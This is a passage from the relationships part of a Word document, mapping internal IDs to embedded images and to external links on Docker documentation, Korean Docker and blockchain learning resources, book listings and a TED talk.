Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/install/linux/docker-ce/ubuntu/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://myanjini.tistory.com/category/%EB%8F%84%EC%BB%A4" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/compose/install/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ted.com/talks/don_tapscott_how_the_blockchain_is_changing_money_and_business/transcript?awesm=on.ted.com_8uhG&amp;utm_campaign=alain_de_botton_a_kinder_gentler_philosophy_of_success&amp;utm_content=ted.com-talkpage&amp;utm_medium=on.ted.com-twitter&amp;utm_source=direct-on.ted.com&amp;language=ko" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kisa.or.kr/public/laws/laws3_View.jsp?cPage=6&amp;mode=view&amp;p_No=259&amp;b_No=259&amp;d_No=53&amp;ST=T&amp;SV=" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ebs.co.kr/tv/show?prodId=348&amp;lectId=3121167" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/engine/reference/commandline/cli/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.inflearn.com/course/%ED%81%B4%EB%A0%88%EC%9D%B4%ED%8A%BC/dashboard" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pyrasis.com/docker.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.yes24.com/Product/Goods/67567126?scode=032&amp;OzSrank=7" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://myanjini.tistory.com/category/%EB%8F%84%EC%BB%A4" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.yes24.com/Product/Goods/58551591?scode=032&amp;OzSrank=3" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/pyrasis/docker-fordummies-44424016" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.yes24.com/Product/Goods/67090202?scode=032&amp;OzSrank=9" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.yes24.com/Product/Goods/58149507?scode=032&amp;OzSrank=5" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ethereumbook/ethereumbook" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.yes24.com/Product/Goods/59621522?scode=032&amp;OzSrank=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